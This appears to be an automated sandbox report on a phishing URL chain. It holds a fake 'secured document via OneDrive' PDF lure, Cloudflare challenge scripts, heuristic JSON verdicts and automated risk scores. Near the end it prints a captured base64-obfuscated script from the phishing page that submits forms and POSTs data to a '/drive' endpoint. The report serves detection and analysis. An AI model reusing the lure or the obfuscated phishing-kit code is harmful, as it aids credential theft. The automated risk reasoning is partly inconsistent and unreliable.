Windows Analysis Report
https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://ik.imagekit.io

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
"contains_trigger_text": true,
"trigger_text": "You've received a secured document via OneDrive; click below to access the document",
"prominent_button_name": "View Document",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
"contains_trigger_text": true,
"trigger_text": "You've received a secured document via OneDrive; click below to access the document",
"prominent_button_name": "View Document",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including the use of obfuscated code, data exfiltration, and redirects to a suspicious domain. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators."
}

(function(){window._cf_chl_opt={cvId: '3',cZone: "jackoffjackofflilliilkillxoopoeadonline.top",cType: 'interactive',cRay: '8fef4ee5989c43ca',cH: '.j39N..SeP9l4XktPhpp0LU58WPiUcAzc6t32TvvVGY-1736372030-1.2.1.1-M1XPJsO4WaaUD_6dneqNXKgvNXsUyBEf9REoNqrkgX_aEKG6gJ33OUH4KmSv7usk',cUPMDTk: "\/drive?__cf_chl_tk=C3MofPGl033zLDMCQ23_3WSw7Ds6woLg8jv6NS0tZDA-1736372030-1.0.1.1-ezzCJff4OLIzEFvW4uW.mMJDHkff8fvKs8K5THw4ZXs",cFPWv: 'g',cITimeS: '1736372030',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/drive?__cf_chl_f_tk=C3MofPGl033zLDMCQ23_3WSw7Ds6woLg8jv6NS0tZDA-1736372030-1.0.1.1-ezzCJff4OLIzEFvW4uW.mMJDHkff8fvKs8K5THw4ZXs",md: "yUZ.i31PP9gxRoSCtvcCs2kTDZnufiUs7LSF7baAUqg-1736372030-1.2.1.1-nPDQEFG6BeulPGciaetYf91awcfvHv9z1GdU6N2Ig59T6cQL8KF19QoenMPUMmM4rdxOrp1MYf1EMFawOn0zotpCbgnWqenAPZCUeu41KbH2Y85VKG5JL6B1Fj3iX1TYcaTB3klSiXSHB4TCzg.jG0F10bP1LmSeUKeeBc0HxSuojrl1uN0tOpVr9SVB0THW5DAkW0uzVihUSwR3rHPA_eLEs6ACuqhXmtTWhjTErA_g64.olpIOCrxfpP9UUWTLvLgct1DWtxbRFYAovRw51xvxcdVAFZ7raQsI14u9WFZ5w0r6CDg_pBeiHqbeTEvolPu6CCWjVqpEdlV4e4uH900DKTzHIb60uGdOHyvFv3rbiR4vvBjh7YEQlP1gsAfTk.494LQnYngjsISKIfo_I9sNaVFUy0.G828HKqNq_bXf_ytpqLVJ2WZ4hDktno3Y.V7jPdg62KJGPsuMBqOS3HM7okwGkazbhTWzjzrG1_KtxXbLQ1wkVNQ4F2UkhaM.6aqpduFqcf8cbaJOHE96MDcT679LmOGTEUScpKudNSyRptOSydSCBxDUJIgj_wi5zROwhuuyWXa1EdIOt77DdxSKF6TYHeqlCLFbmmRRdQXqyOeDdCf6urk6ljn__JJQ3PEIdMGSHYMHS_HTnDrBgQXd2BS9Z48WwbUGYupJn9KnaZbgbRDt69MSZ8V2_g1MaGN9VK.YXBN.d6Di2ernUPI4uamWOoOHNC5J4G84HSk9Oh2sCd7aGl7hef8qJQ7qkBa.sWStAtOaLjJuRt4JdJfVyLOykEZGqGa3zW.AqjUPYIkXglt.L4fvXdzXglImnGozAwrePO_Tynx6PTrbi01523dRfOacZfb9KJF.PrLlTMQTaDIZpARE3DFh1WFFXvyC9brgeXgpzaWG2wVz2LfhxH.63VeSsJVmcJCoZrMARtEccn8vOdbyPwerKuJmsxGUNGaHTEvvXNtZXznPvQ6ONsuh2OvZ8Z_QfeBFWrY7adNzNP8K98ZfnTXWDSxYJ60fqJeeErLWlAUBgbsixhWpG5dWzh8VJB9SfNkkzbhJ8PJjLUbvtp0GPwpT1v1sG14yNa.opjNSEYkWnQZHo_uxUfUCOzwLCxpbdEjC5BMUNgONBmGo89hDNDx0eRuxKKJC6YJOCfGXIxk7SxmB.TwunZ42KVp7jYRwfKlm7.nk4GjaY5JjlTcgj5lIhW3Nr0EFBpJlqUSCmc.XlFSe96a6J_loW1tpFH5n7_TytMZe1hZqn_ijv9cAAJfvEYQj0xLrGGLNaBFdD7t3nZsFAUS0vvLWpjuXIit__pRO147vlJCkvM8K98MLd7NL1u5f0k7Ma4wZr5qwNU3uAeQ5FbwPMVV7Uu8CwqmdzSmKKGI0CjrGmx_JhSCdVbJcbIu834he3j24oLCvh8JRsTdKSRz7z11v3nIhuyNVW0nN3nmGe011pzLxSISazgiGiWvUOQYrqMeWCIWzcABWf88mxdhQrF97iZjPS.wroaW9.GF_9z25aVwTm3gj0Sd_xlw6CzHyV01j3u9N.PiI5v4sfPw8fQhb0eDHsEuA0ZA1terzFZPGffq.5xkCYeo7lhGTFBHSVJsuk3.RiXgHLcpuZEPVMJHg2T5rQsi.GFwj6KQxHRFitW.z.BJxvbDvQtrH9csMNL63oQb85NQr9mXLJeOocZbSHYzbjJHUHcnSREx3SwMl7qzJgJlEOA0C2vMSw.1WMRK7Ee5f.504VvEYcm4GdtyPTgKWG_jZCTy_SHFqUNCqlBMQN7u1lCW7Oh8RCtc7tA92fcEbN6TXwNoNpsK6rj4YnxJsvFArLWDka2zgXw5md5hPEG7.Ixt1QnpPLtAXvg8VAy4J9j92vGpR1RyzTqcOXLuKshNiryMRnxFr7AHEPqseQ2_k71f6_7uMXotiVE.2Qq.WEI1QOLgIxA",mdrd: "UzESROZqX84ZvBm86RGgeJMa7Inw_2lIPwz4QYZ30Sk-1736372030-1.2.1.1-VkI8cmXMO3nNZn_piT4YR4WtpxKXxodCuY2M.I0MWaJwB9__OaUEgfeNA673hOg.wJraovi.sCMDuJuHcM9TrN9iPTI76KQ1bPpXCSHjLS4sugNaDISQNWismCae3sTtE4xayRPWS9.d_3aYvwWF9N_UssTGkVvJ_2HwjzMgsKkB1Lky.ZwPoB7OLRXFIcQM5xR4Zittqvl40SEsvp2k05ZNYTpEHbky4UcI5IjlLFEV2eOj.GS4Rbzgt10sHUg1QEooOal_cVjTP1E3sqWVCl2c3aQanfXIRvNQOONUGuARb.o2K.cpFjN9Yb_xRwMuKGBv.TvN0omg5dCW684284rQ8yZXu3pU0NjGZBf_9StD3xqbVFPnco9Nk0BbuIGOT.GfQMNTlLCduBNVCCnwZ_kT_dZOxNFh5QNY9tpWy89N07AtJ2RrEf9VF_21.wpQMQWHTEYwxQDzUPvv_Qp_YVFeNBIcoa..j9mmoueto1rOO5qmDp_SUKWi3hL1erPpgh5Xl53h9Xbs.a2Hhz3Kof3pYui7cq7mSlBUDSTkFbejqH4usKvRxrjAIQqQvUE8sEsQJBCN4mm38tqmoR_mfK.BqP1P1MX_uZtGTA6sooujYlKA0uLFHazxiLilXOubvxnifhNJ.apGPUNVZkaSAU9VUWPNCUjqcBdh4hmW.lKBXHw5OB2Wc1NWiUFGqE1zMZN8DS.bP6Z7lVoEMPEvUnT6wjYtZgsr8jy_rirF0aGReWMFNBc9YnxHcbPSCVJmwxFDDP_dh6c6PcLnaMyZ8ZP6Q.qOpVOwMIxmS_gWnrOZI2aMlJ9238r5s.w5sF.ExFK6n8jzZPLlmG_._tA2_5Q8IMTGsB6qSTeOmwTJmrQxEqshOcyLidUMyOA43d90ywqJfvF1iO4rQwSUnqSselY56nZvj85.u0QR3sEaYptt4czJMsg0IadeoZ7BPqKU6TV6aGnPg.FsnrYC.bZifAzsYO3aQQZpkmZypuZzlO358mZ7ekwZdPCVs9YrbcJxiGLaHLATLNAuqAxKp1GVD5aBoZsL_3AvIttOeXX1EYyX6WC9OYjej.37ZaCp7i7LQGhIKa_eJHaOG1A.2u7WOcAZeTaSwrCYenhV_RYJMgT1_yrQ4cu2qS12f9lPffUf9f0NQ2ymVEoCboXek6pVuXYa7BwEqwKYpqB3xOxmLHqsrH3e4ik6B3stEYKCCsIIJTvygMiYsl_A.OqMeGrE.VpccBmOMDLfko6yzsgqUF.1X29r7QBy

{
    "risk_score": 6,
    "reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. While the script contains some obfuscated code and makes use of various Cloudflare-specific APIs, it does not exhibit any clear signs of malicious behavior. However, the extensive use of obfuscation and the presence of some potentially sensitive information (e.g., API keys) warrant a medium-risk score for further review."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'a3umx',
                chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: 'F_cHXGIYTEVgqdFeoOyOTQTQCs40h.tCMS7tZ6.J0_w-1736372032-1.3.1.1-nrQWGTJbmKvw2FXRtiUH50nb2KrQaivsOoNrSqW.lkY',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '8fef4ef4eb8e4376',
                cH: 'sL7K.YIifBS09aNXZvPva1qg5TiGP7M8D7lRdOwb8ug-1736372032-1.1.1.1-bxfIBmGkvK4Xvn2QkJhirbMWphyuLod3pHLvgHxZNK.vcA.hFaWUpYotFvSZ08E_',
                cFPWv: 'g',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'light',
                wS: 'normal',
                md: 'zxKabkTEoUYWxUTNv46kgySYkvMk4LDi3AvOcF8ATX0-1736372032-1.1.1.1-tr4Ou0e0dJWR7IPHlDsLS09OQOtbHl.63sDzzfc0sUIASphsyzcgAb.RbY89U7rZ0IZkux.e2pDMtKWnd2DDzfPXBENm7kTe9SOr9Ml7l5_d4WwgLumRvTPtspihkfMtLz.UL4vaZ0kqYbsCGUPbyz2u8FhfMr1L8ZZtdDehNldosTv6to4_0Vre1HwrqZDqm1MKX.DHcM1xgBnwpASatSmW3x.cFo3ZnPp7G3gbZLYvjK8WwWBz6D.ZxYi0fby.upAmm6gd10kMFkY33Iy9Lxydq7hfNhsTf9yLlR47q4iBqF9zY3rfNKQErkjc9CTCMhjCh5R8VHd2FlBZCgNwfsiBu5DZI0Hy23kA1zWo8KrEUxxABjh3tHKv.ixga9PVv1qZnh6C_Rs0_USVEjxwmSW06GD2xchRyIbJGrfvWhY0wPi7AQJpQLhGOnrc40oCjPTg7Y70XcigoI6bMD_b0ULehdiR5HgspDWfK0LMRnXSuGoQXlXW3hJaFXIKGwcgsvLjgGkHAYwDa4k4686EWTzmk52ZGqqVhR3aUxVzIlB_.KzCT6BHJ9C7zd5fL3659sNmHwdykJj_r_.Nw3i_q_7yu9rwCv.FEQxoVlNOUl6NlcVkdMTEVLlDGdoCcC_81r2uVoBMlOwx3euK41X1X9hzA9TgQ7YKH60VfWgGwCJglN.Dm4lIiIvMCUPAzskwSvBh6WdJOA8X55Rn7iH2XHejI9uh8dQszA3

{
    "risk_score": 1,
    "reasoning": "This script appears to be related to Cloudflare's security challenge system, which is a legitimate service used to protect websites from abuse. The script sets up configuration options and translations for the Cloudflare challenge, which is a common practice for websites that utilize Cloudflare's services. There are no indicators of malicious behavior, and the script seems to be serving a legitimate purpose."
}

window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_overrun_description":"Stuck%20here%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","turnstile_footer_privacy":"Privacy","turnstile_feedback_description":"Send%20Feedback","turnstile_feedback_report":"Having%20trouble%3F","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_verifying":"Verifying...","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","human_button_text":"Verify%20you%20are%20human","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_expired":"Expired","turnstile_refresh":"Refresh","turnstile_footer_terms":"Terms","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_failure":"Error","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eV,f4,f5,fx,fA,fC,fD,fE,fQ,g2,g8,g9,ga,gk,gv,gz,gA,gB,gF,gG,gH,f2,f3){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(566))/1*(parseInt(gI(1498))/2)+parseInt(gI(1206))/3+parseInt(gI(539))/4+parseInt(gI(1918))/5+parseInt(gI(1814))/6*(-parseInt(gI(808))/7)+parseInt(gI(627))/8*(-parseInt(gI(1022))/9)+parseInt(gI(1338))/10*(-parseInt(gI(1755))/11),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,533562),eM=this||self,eN=eM[gJ(1227)],eO=function(gK,d,e,f,g){return gK=gJ,d={'zuzMA':function(h,i){return h(i)},'GwkdB':function(h,i){return h*i},'RpJUy':function(h,i){return h^i},'pycSI':function(h,i){return h^i},'blJPX':function(h,i){return i^h},'nHPHK':function(h,i){return h^i},'OjBKt':function(h,i){return h+i},'YKiqI':function(h,i){return i===h},'bCAEb':function(h,i){return h<i},'iQHYZ':function(h,i){return h+i},'aUMxQ':function(h,i){return h>i},'RYUee':function(h,i){return h>i},'xaVFW':function(h,i){return i&h},'QlRIe':function(h,i){return i==h},'NRGdT':function(h,i){return h-i},'WeCub':function(h,i){return h<<i},'lGPtO':function(h,i){return h<<i},'YLuQT':function(h,i){return h-i},'Txpkb':function(h,i){return i|h},'pDWNw':function(h,i){return h(i)},'mLgQX':function(h,i){return h!==i},'MgBKi':function(h,i){return h==i},'fKmLM':function(h,i){return h-i},'djlGl':function(h,i){return h|i},'dtCmC':function(h,i){return h-i},'CTpig':function(h,i){return h<i},'hFHRr':function(h,i){return h|i},'XqCzB':function(h,i){return h-i},'QxbqW':function(h,i){return i!=h},'hbshX':function(h,i){return i&h},'dLpoY':function(h,i){return i==h},'eFPcs':function(h,i){return h*i},'dJXHm':function(h,i){

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate security mechanism used to protect websites from abuse. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a common pattern for Cloudflare's challenge system. While the script uses some legacy practices like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, the script seems to be a benign implementation of Cloudflare's challenge functionality."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'a3umx',
                chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: 'F_cHXGIYTEVgqdFeoOyOTQTQCs40h.tCMS7tZ6.J0_w-1736372032-1.3.1.1-nrQWGTJbmKvw2FXRtiUH50nb2KrQaivsOoNrSqW.lkY',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '8fef4ef4eb8e4376',
                cH: 'sL7K.YIifBS09aNXZvPva1qg5TiGP7M8D7lRdOwb8ug-1736372032-1.1.1.1-bxfIBmGkvK4Xvn2QkJhirbMWphyuLod3pHLvgHxZNK.vcA.hFaWUpYotFvSZ08E_',
                cFPWv: 'g',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'light',
                wS: 'normal',
                md: 'zxKabkTEoUYWxUTNv46kgySYkvMk4LDi3AvOcF8ATX0-1736372032-1.1.1.1-tr4Ou0e0dJWR7IPHlDsLS09OQOtbHl.63sDzzfc0sUIASphsyzcgAb.RbY89U7rZ0IZkux.e2pDMtKWnd2DDzfPXBENm7kTe9SOr9Ml7l5_d4WwgLumRvTPtspihkfMtLz.UL4vaZ0kqYbsCGUPbyz2u8FhfMr1L8ZZtdDehNldosTv6to4_0Vre1HwrqZDqm1MKX.DHcM1xgBnwpASatSmW3x.cFo3ZnPp7G3gbZLYvjK8WwWBz6D.ZxYi0fby.upAmm6gd10kMFkY33Iy9Lxydq7hfNhsTf9yLlR47q4iBqF9zY3rfNKQErkjc9CTCMhjCh5R8VHd2FlBZCgNwfsiBu5DZI0Hy23kA1zWo8KrEUxxABjh3tHKv.ixga9PVv1qZnh6C_Rs0_USVEjxwmSW06GD2xchRyIbJGrfvWhY0wPi7AQJpQLhGOnrc40oCjPTg7Y70XcigoI6bMD_b0ULehdiR5HgspDWfK0LMRnXSuGoQXlXW3hJaFXIKGwcgsvLjgGkHAYwDa4k4686EWTzmk52ZGqqVhR3aUxVzIlB_.KzCT6BHJ9C7zd5fL3659sNmHwdykJj_r_.Nw3i_q_7yu9rwCv.FEQxoVlNOUl6NlcVkdMTEVLlDGdoCcC_81r2uVoBMlOwx3euK41X1X9hzA9TgQ7YKH60VfWgGwCJglN.Dm4lIiIvMCUPAzskwSvBh6WdJOA8X55Rn7iH2XHejI9uh8dQszA3cu6NxsdzfuZ6jJb9rHxIFutPOyh5JgCRvNCX8zddbRTUl7N8QDNVr0oa3f3mq_eg5KwukL_2jVHKHOTmeLV_pk4nsUzDgSg9A_nThyLXNGY8Tu6pWyaqcI3yioh25OJ7X6QuWHNg4MqiyzW2uwFAcU1yJu9Km5018ORZBdu6YyXl2_BExcrMMb4lALUWz8aS9_kS8oLS2FVWownBed6_C9IzLsOQWpPuoLbkxgHOHXQmlvziOJeIwijRhGjDBZl8SqDjgNU83o.ps9vGjLva7sJAJJTL.6RpTNFQ0gHS34YQ.osV6mh.bWRjS8G1ROCQoCHjt0T_MRDjNRgH9XNTzfBg_94NEYVzdZ4LdYo7LXGbxtBHwKAAyhVrk.pIaVD_cV3ugRYXJZIGf_P_Z6NN_MnYPIkWxpEtyO6B1VEahNVV0g6tco_zljolRX3Gi35DAqy0C9A0ARqMiKVXLda.9sTxYW8w_PwUQKKnzVF1sw7TzYAd7tFLIcdCk5eu2QCtQWQHtMLVMAbTURhDuc4o_2AjumOy6OTnAFe_rC_4yGjswOGwwe.kDfhMJmcUXWtdGZM_m6x54hiRX5GufC2srrE9xCcgTNBnSjjhSm4z59Ahln6524M.CT4xLekPSR2hU3KZ_3Yg',
                cITimeS: '1736372032',
                refresh: function(){
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: 'a3umx',
                            nextRcV: 'F_cHXGIYTEVgqdFeoOyOTQTQCs40h.tCMS7tZ6.J0_w-1736372032-1.3.1.1-nrQWGTJbmKvw2FXRtiUH50nb2KrQaivsOoNrSqW.lkY',
                            event: 'reloadRequest',
                        }, "*");
                    }
                }
            };
            var handler = function(event) {
                var e = event.data;
                if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: window._cf_chl_opt.chlApiWidgetId,
                            event: 'food',
                            seq: e.seq,
                        }, '*');
                    }
                }
            }
            window.addEventListener('message', handler);
        }());
    

{
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": true,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://jackoffjackofflilliilkillxoopoeadonline.top

{
  "brands": "unknown"
}

{
  "brands": [
    "Cloudflare"
  ]
}

```json
{
    "risk_score": 3,
    "reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The obfuscation could be for legitimate purposes, such as protecting intellectual property, but it warrants further review to ensure there is no hidden malicious intent."
}

"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code, and redirects to potentially malicious domains. The script appears to be collecting sensitive user information and sending it to an external server, which is a clear indication of malicious intent. Additionally, the use of heavily obfuscated code and the presence of suspicious domain interactions further increase the risk score. Overall, this script demonstrates a high level of risk and should be treated with caution."
}

var _0510567="AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsKICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogIH0KfSBlbHNlIHsKICAgICAgICAgICAgICAgICBpZiAoIXdpbmRvdy5sb2NhdGlvbi5oYXNoKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IHdpbmRvdy5sb2NhdGlvbi5ocmVmOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVsb2FkKCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9Cn0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIH07CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLm9wZW4oIlBPU1QiLCAiL2RyaXZlIiwgdHJ1ZSk7CiAgICAgICAgICAgICAgICAgICAgICAgIHhodHRwLnNldFJlcXVlc3RIZWFkZXIoJ1k2Mk9uME9KZ05RME5ETmhDMmhaOGdvS3MyOCcsIF8yNzlfMzA1KTsgLy9tYWtlIHRoZSBhbnN3ZXIgd2hhdCBldmVyI